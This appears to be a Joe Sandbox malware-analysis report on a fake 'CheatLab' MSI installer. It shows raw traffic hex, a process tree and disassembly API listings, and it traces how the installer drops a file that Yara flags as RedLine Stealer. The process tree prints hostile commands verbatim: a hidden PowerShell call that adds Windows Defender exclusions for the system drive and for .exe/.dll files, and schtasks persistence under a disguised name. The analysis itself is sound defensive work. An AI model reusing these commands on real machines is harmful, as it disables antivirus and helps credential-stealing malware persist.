                                                    2023-11-04 00:30:16 UTC1308INData Raw: 64 2c 66 63 2c 64 61 2c 63 66 2c 66 33 2c 64 36 2c 64 64 2c 31 31 61 2c 66 31 2c 63 61 2c 64 36 2c 31 33 34 2c 31 34 62 2c 31 32 32 2c 31 30 65 2c 31 30 35 2c 64 31 2c 62 31 2c 62 34 2c 63 30 2c 31 30 34 2c 66 32 2c 65 37 2c 66 37 2c 31 31 38 2c 31 33 37 2c 65 64 2c 65 63 2c 66 31 2c 64 35 2c 65 31 2c 66 31 2c 31 33 66 2c 31 32 31 2c 66 66 2c 65 30 2c 66 64 2c 65 36 2c 31 30 37 2c 65 66 2c 65 30 2c 62 39 2c 63 39 2c 31 30 34 2c 64 32 2c 31 31 62 2c 64 30 2c 31 30 37 2c 63 31 2c 62 32 2c 65 66 2c 66 62 2c 31 31 31 2c 66 35 2c 31 31 36 2c 66 36 2c 31 31 38 2c 31 33 37 2c 65 64 2c 65 63 2c 66 65 2c 64 35 2c 65 31 2c 64 65 2c 64 36 2c 65 61 2c 63 64 2c 64 37 2c 66 62 2c 63 63 2c 31 30 38 2c 65 63 2c 66 32 2c 62 36 2c 63 32 2c 31 33 34 2c 65 63 2c 31 32 65 2c
                                                    Data Ascii: d,fc,da,cf,f3,d6,dd,11a,f1,ca,d6,134,14b,122,10e,105,d1,b1,b4,c0,104,f2,e7,f7,118,137,ed,ec,f1,d5,e1,f1,13f,121,ff,e0,fd,e6,107,ef,e0,b9,c9,104,d2,11b,d0,107,c1,b2,ef,fb,111,f5,116,f6,118,137,ed,ec,fe,d5,e1,de,d6,ea,cd,d7,fb,cc,108,ec,f2,b6,c2,134,ec,12e,
                                                    2023-11-04 00:30:16 UTC1324INData Raw: 65 66 2c 64 38 2c 31 30 33 2c 64 30 2c 31 32 35 2c 62 61 2c 62 66 2c 31 30 30 2c 65 66 2c 64 64 2c 65 38 2c 65 32 2c 66 33 2c 62 37 2c 63 39 2c 66 61 2c 63 64 2c 64 62 2c 62 65 2c 31 33 66 2c 31 30 65 2c 63 66 2c 66 30 2c 66 33 2c 63 62 2c 65 36 2c 31 31 35 2c 65 62 2c 63 38 2c 63 37 2c 66 65 2c 65 36 2c 66 61 2c 31 33 63 2c 31 31 39 2c 63 36 2c 64 66 2c 62 34 2c 63 30 2c 64 64 2c 31 31 31 2c 64 37 2c 65 61 2c 64 61 2c 63 35 2c 65 36 2c 63 32 2c 31 30 30 2c 63 36 2c 64 39 2c 62 64 2c 64 62 2c 31 35 64 2c 65 65 2c 64 35 2c 31 31 36 2c 64 36 2c 64 64 2c 65 34 2c 31 31 30 2c 63 31 2c 64 34 2c 66 37 2c 65 34 2c 66 39 2c 64 38 2c 31 36 38 2c 64 33 2c 63 31 2c 62 66 2c 64 33 2c 65 65 2c 65 66 2c 63 65 2c 65 32 2c 31 30 36 2c 63 66 2c 63 38 2c 62 63 2c 66 61 2c
                                                    Data Ascii: ef,d8,103,d0,125,ba,bf,100,ef,dd,e8,e2,f3,b7,c9,fa,cd,db,be,13f,10e,cf,f0,f3,cb,e6,115,eb,c8,c7,fe,e6,fa,13c,119,c6,df,b4,c0,dd,111,d7,ea,da,c5,e6,c2,100,c6,d9,bd,db,15d,ee,d5,116,d6,dd,e4,110,c1,d4,f7,e4,f9,d8,168,d3,c1,bf,d3,ee,ef,ce,e2,106,cf,c8,bc,fa,
                                                    2023-11-04 00:30:16 UTC1340INData Raw: 65 36 2c 62 39 2c 64 34 2c 66 33 2c 65 36 2c 31 35 65 2c 64 39 2c 66 39 2c 63 37 2c 62 35 2c 63 32 2c 63 30 2c 64 64 2c 31 35 34 2c 66 34 2c 66 31 2c 64 63 2c 63 38 2c 62 33 2c 63 35 2c 31 30 61 2c 63 63 2c 64 62 2c 62 30 2c 64 61 2c 31 35 64 2c 66 39 2c 64 65 2c 66 30 2c 65 30 2c 64 37 2c 66 33 2c 31 30 66 2c 63 30 2c 63 33 2c 31 30 30 2c 65 38 2c 65 61 2c 63 64 2c 66 36 2c 63 62 2c 63 30 2c 62 30 2c 64 62 2c 64 61 2c 65 66 2c 64 34 2c 66 31 2c 31 34 39 2c 66 30 2c 63 34 2c 62 36 2c 31 31 64 2c 63 62 2c 63 65 2c 62 64 2c 64 63 2c 65 39 2c 63 65 2c 64 31 2c 66 33 2c 65 30 2c 64 38 2c 31 30 31 2c 65 62 2c 63 34 2c 63 33 2c 31 30 30 2c 31 34 62 2c 31 31 37 2c 64 37 2c 66 34 2c 65 65 2c 62 63 2c 62 37 2c 63 64 2c 65 66 2c 64 62 2c 64 33 2c 65 32 2c 65 34 2c
                                                    Data Ascii: e6,b9,d4,f3,e6,15e,d9,f9,c7,b5,c2,c0,dd,154,f4,f1,dc,c8,b3,c5,10a,cc,db,b0,da,15d,f9,de,f0,e0,d7,f3,10f,c0,c3,100,e8,ea,cd,f6,cb,c0,b0,db,da,ef,d4,f1,149,f0,c4,b6,11d,cb,ce,bd,dc,e9,ce,d1,f3,e0,d8,101,eb,c4,c3,100,14b,117,d7,f4,ee,bc,b7,cd,ef,db,d3,e2,e4,
                                                    2023-11-04 00:30:16 UTC1356INData Raw: 64 30 2c 66 66 2c 63 66 2c 62 37 2c 61 66 2c 65 66 2c 64 30 2c 65 66 2c 65 32 2c 66 31 2c 64 62 2c 63 33 2c 63 30 2c 63 39 2c 66 35 2c 31 33 34 2c 66 37 2c 61 66 2c 65 39 2c 66 63 2c 64 31 2c 64 61 2c 66 38 2c 31 30 31 2c 65 36 2c 66 35 2c 65 61 2c 62 63 2c 64 34 2c 66 39 2c 31 34 62 2c 31 30 61 2c 63 64 2c 31 31 61 2c 62 66 2c 62 39 2c 62 37 2c 64 31 2c 65 30 2c 65 38 2c 65 31 2c 31 31 32 2c 65 34 2c 64 34 2c 63 30 2c 62 64 2c 31 30 30 2c 63 38 2c 31 34 30 2c 63 65 2c 64 30 2c 31 31 39 2c 64 38 2c 65 30 2c 66 33 2c 64 38 2c 65 61 2c 65 63 2c 31 35 33 2c 65 34 2c 62 64 2c 66 31 2c 64 39 2c 66 64 2c 64 39 2c 66 34 2c 66 30 2c 63 30 2c 63 30 2c 63 39 2c 64 35 2c 66 33 2c 64 61 2c 31 35 36 2c 31 30 34 2c 62 66 2c 62 35 2c 62 38 2c 31 30 30 2c 64 31 2c 63 63
                                                    Data Ascii: d0,ff,cf,b7,af,ef,d0,ef,e2,f1,db,c3,c0,c9,f5,134,f7,af,e9,fc,d1,da,f8,101,e6,f5,ea,bc,d4,f9,14b,10a,cd,11a,bf,b9,b7,d1,e0,e8,e1,112,e4,d4,c0,bd,100,c8,140,ce,d0,119,d8,e0,f3,d8,ea,ec,153,e4,bd,f1,d9,fd,d9,f4,f0,c0,c0,c9,d5,f3,da,156,104,bf,b5,b8,100,d1,cc
                                                    2023-11-04 00:30:16 UTC1372INData Raw: 2c 62 65 2c 63 30 2c 31 34 32 2c 31 30 35 2c 64 36 2c 66 31 2c 64 62 2c 66 36 2c 62 64 2c 63 33 2c 66 32 2c 63 32 2c 64 37 2c 61 65 2c 64 37 2c 66 30 2c 65 64 2c 64 31 2c 65 64 2c 63 66 2c 65 32 2c 66 34 2c 65 65 2c 62 37 2c 31 33 35 2c 31 31 63 2c 31 30 35 2c 65 66 2c 63 61 2c 66 62 2c 64 33 2c 62 31 2c 64 33 2c 63 30 2c 64 33 2c 64 65 2c 64 64 2c 66 32 2c 65 34 2c 63 35 2c 31 32 39 2c 62 61 2c 65 66 2c 63 35 2c 63 61 2c 62 39 2c 64 62 2c 66 38 2c 63 62 2c 31 34 33 2c 31 31 35 2c 65 30 2c 64 37 2c 31 30 35 2c 64 66 2c 62 37 2c 63 63 2c 66 37 2c 65 34 2c 31 31 63 2c 63 37 2c 66 66 2c 63 38 2c 63 31 2c 62 65 2c 63 30 2c 31 34 32 2c 66 30 2c 65 35 2c 65 32 2c 65 38 2c 66 31 2c 62 61 2c 62 65 2c 66 64 2c 63 66 2c 63 65 2c 31 32 32 2c 65 63 2c 65 64 2c 64 38
                                                    Data Ascii: ,be,c0,142,105,d6,f1,db,f6,bd,c3,f2,c2,d7,ae,d7,f0,ed,d1,ed,cf,e2,f4,ee,b7,135,11c,105,ef,ca,fb,d3,b1,d3,c0,d3,de,dd,f2,e4,c5,129,ba,ef,c5,ca,b9,db,f8,cb,143,115,e0,d7,105,df,b7,cc,f7,e4,11c,c7,ff,c8,c1,be,c0,142,f0,e5,e2,e8,f1,ba,be,fd,cf,ce,122,ec,ed,d8
                                                    2023-11-04 00:30:16 UTC1388INData Raw: 34 2c 65 65 2c 64 32 2c 64 37 2c 65 36 2c 66 32 2c 63 30 2c 63 37 2c 66 31 2c 64 38 2c 31 35 65 2c 63 63 2c 31 30 37 2c 63 32 2c 62 31 2c 62 30 2c 31 33 32 2c 65 66 2c 64 66 2c 64 36 2c 65 36 2c 64 61 2c 63 35 2c 62 35 2c 62 37 2c 31 36 31 2c 63 35 2c 63 63 2c 62 61 2c 64 61 2c 65 62 2c 66 31 2c 64 61 2c 65 39 2c 64 31 2c 64 38 2c 31 35 38 2c 65 63 2c 63 34 2c 63 31 2c 31 30 36 2c 31 30 36 2c 65 36 2c 64 33 2c 66 35 2c 63 30 2c 62 32 2c 31 32 33 2c 65 65 2c 64 33 2c 65 37 2c 65 35 2c 65 64 2c 64 62 2c 66 32 2c 62 31 2c 63 31 2c 65 65 2c 63 30 2c 63 64 2c 31 32 32 2c 66 61 2c 65 66 2c 63 61 2c 63 65 2c 65 61 2c 65 30 2c 31 30 37 2c 65 66 2c 65 31 2c 63 34 2c 64 32 2c 66 31 2c 64 63 2c 65 63 2c 63 33 2c 31 32 33 2c 62 63 2c 62 63 2c 62 30 2c 62 65 2c 63 66
                                                    Data Ascii: 4,ee,d2,d7,e6,f2,c0,c7,f1,d8,15e,cc,107,c2,b1,b0,132,ef,df,d6,e6,da,c5,b5,b7,161,c5,cc,ba,da,eb,f1,da,e9,d1,d8,158,ec,c4,c1,106,106,e6,d3,f5,c0,b2,123,ee,d3,e7,e5,ed,db,f2,b1,c1,ee,c0,cd,122,fa,ef,ca,ce,ea,e0,107,ef,e1,c4,d2,f1,dc,ec,c3,123,bc,bc,b0,be,cf



                                                    Target ID:0
                                                    Start time:01:29:51
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\msiexec.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.1.msi"
                                                    Imagebase:0x7ff6bc750000
                                                    File size:69'632 bytes
                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:01:29:52
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\msiexec.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                    Imagebase:0x7ff6bc750000
                                                    File size:69'632 bytes
                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:3
                                                    Start time:01:29:52
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 14B5C758307391A0BF1CDD495750E97E C
                                                    Imagebase:0xdf0000
                                                    File size:59'904 bytes
                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:01:30:00
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 89A97588E5A998E3A3D91B47458C8C78
                                                    Imagebase:0xdf0000
                                                    File size:59'904 bytes
                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:01:30:00
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 19958F299480DC364B0F0BF5C3172345 E Global\MSI0000
                                                    Imagebase:0xdf0000
                                                    File size:59'904 bytes
                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:01:30:00
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\Installer\MSI7D5A.tmp
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Installer\MSI7D5A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat
                                                    Imagebase:0xa40000
                                                    File size:399'328 bytes
                                                    MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:01:30:00
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat""
                                                    Imagebase:0x790000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:01:30:01
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:01:30:01
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                                                    Imagebase:0x280000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:01:30:06
                                                    Start date:04/11/2023
                                                    Path:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
                                                    Imagebase:0x7ff7b1de0000
                                                    File size:1'159'184 bytes
                                                    MD5 hash:1BC7714501F86D5988816461F3637269
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    • Detection: 1%, Virustotal, Browse
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:13
                                                    Start time:01:30:14
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks /create /sc daily /st 12:47 /f /tn AMDCheckUpdates_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua""
                                                    Imagebase:0x7ff7981a0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:01:30:14
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks /create /sc daily /st 12:47 /f /tn "LuaJIT" /tr ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua""
                                                    Imagebase:0x7ff7981a0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:01:30:14
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:01:30:14
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:01:30:15
                                                    Start date:04/11/2023
                                                    Path:C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua
                                                    Imagebase:0x7ff73ae60000
                                                    File size:1'159'184 bytes
                                                    MD5 hash:1BC7714501F86D5988816461F3637269
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    • Detection: 1%, Virustotal, Browse
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:01:30:26
                                                    Start date:04/11/2023
                                                    Path:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
                                                    Imagebase:0x7ff7b1de0000
                                                    File size:1'159'184 bytes
                                                    MD5 hash:1BC7714501F86D5988816461F3637269
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:01:30:35
                                                    Start date:04/11/2023
                                                    Path:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
                                                    Imagebase:0x7ff7b1de0000
                                                    File size:1'159'184 bytes
                                                    MD5 hash:1BC7714501F86D5988816461F3637269
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:01:30:50
                                                    Start date:04/11/2023
                                                    Path:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                                                    Imagebase:0x400000
                                                    File size:1'070'058'901 bytes
                                                    MD5 hash:A8A24AF1D9E83BE788BD28D64967FE32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2617633919.00000000020B2000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:01:30:50
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:01:30:53
                                                    Start date:04/11/2023
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 840
                                                    Imagebase:0x2b0000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:1.3%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:31.2%
                                                      Total number of Nodes:320
                                                      Total number of Limit Nodes:7

                                                      Control-flow Graph

                                                      APIs
                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00A4549C
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00A4551D
                                                      • ShellExecuteExW.SHELL32(?), ref: 00A45601
                                                      • ShellExecuteExW.SHELL32(?), ref: 00A45637
                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00A4567C
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A45685
                                                      • GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 00A45688
                                                      • AllowSetForegroundWindow.USER32(00000000), ref: 00A4568B
                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00A456AB
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00A456AE
                                                      • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00A456CA
                                                      • EnumWindows.USER32(00A45830,?), ref: 00A456DF
                                                      • BringWindowToTop.USER32(00000000), ref: 00A456F4
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00A45711
                                                      • GetExitCodeProcess.KERNELBASE(?,?), ref: 00A4571B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Window$AddressExecuteForegroundHandleModuleProcProcessShellWindows$AllowBringCodeDirectoryEnumExitObjectSingleSleepWait
                                                      • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                      • API String ID: 185584925-2796270252
                                                      • Opcode ID: 038f4f625846719812a304c4ff56971dc455b032db57081d831e6e9f76a1b212
                                                      • Instruction ID: 76ca26d38ed76b94ae22593a58740e5642e70ed7f9a8cd54c43c148c8e3a93c2
                                                      • Opcode Fuzzy Hash: 038f4f625846719812a304c4ff56971dc455b032db57081d831e6e9f76a1b212
                                                      • Instruction Fuzzy Hash: CBE1D239E00A099BCF11DFB8C985BAEB7F5FF85710F644629E815AB292E7309D41CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 00A46AC8
                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00A46AD5
                                                      • CloseHandle.KERNEL32(00000000), ref: 00A46AF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCurrentHandleOpenToken
                                                      • String ID: S-1-5-18
                                                      • API String ID: 4052875653-4289277601
                                                      • Opcode ID: 5ce4fa38e2810fbd1d07c92f05d01d18caee44ae34e5169ebef378e5d752ff10
                                                      • Instruction ID: a8f1b53048a44f6f24bd64627de72238c8746c113429827e6defc1c6c2853df4
                                                      • Opcode Fuzzy Hash: 5ce4fa38e2810fbd1d07c92f05d01d18caee44ae34e5169ebef378e5d752ff10
                                                      • Instruction Fuzzy Hash: D102E438D00619CFDF14DFA4C9557EEBBB5EF86314F148658E842AB281EB70AE05CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 252 a457c0-a457df GetCurrentProcess OpenProcessToken 253 a457e7-a45814 GetTokenInformation 252->253 254 a457e1-a457e6 252->254 255 a45816-a4581b 253->255 256 a4581e-a4582e CloseHandle 253->256 255->256
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000008,?,838A949E,?,-00000010), ref: 00A457D0
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00A457D7
                                                      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00A4580C
                                                      • CloseHandle.KERNEL32(?), ref: 00A45822
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                      • String ID:
                                                      • API String ID: 215268677-0
                                                      • Opcode ID: 08440a8bf8745e46b411c25f0c7dd7c57ea848c08281c0989a871a75a79893de
                                                      • Instruction ID: b486b37f5824997e25ecbe48a58bef5885103c8acc3a081ce6529bdbedefa0a2
                                                      • Opcode Fuzzy Hash: 08440a8bf8745e46b411c25f0c7dd7c57ea848c08281c0989a871a75a79893de
                                                      • Instruction Fuzzy Hash: D7F0F974548301ABEB10DF60EC49BAA7BE8BB84700F608829F995D21A0D779D51DDB63
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCommandLineW.KERNEL32(838A949E,?,?,?,?,?,?,?,?,?,00A856D5,000000FF), ref: 00A4CDE8
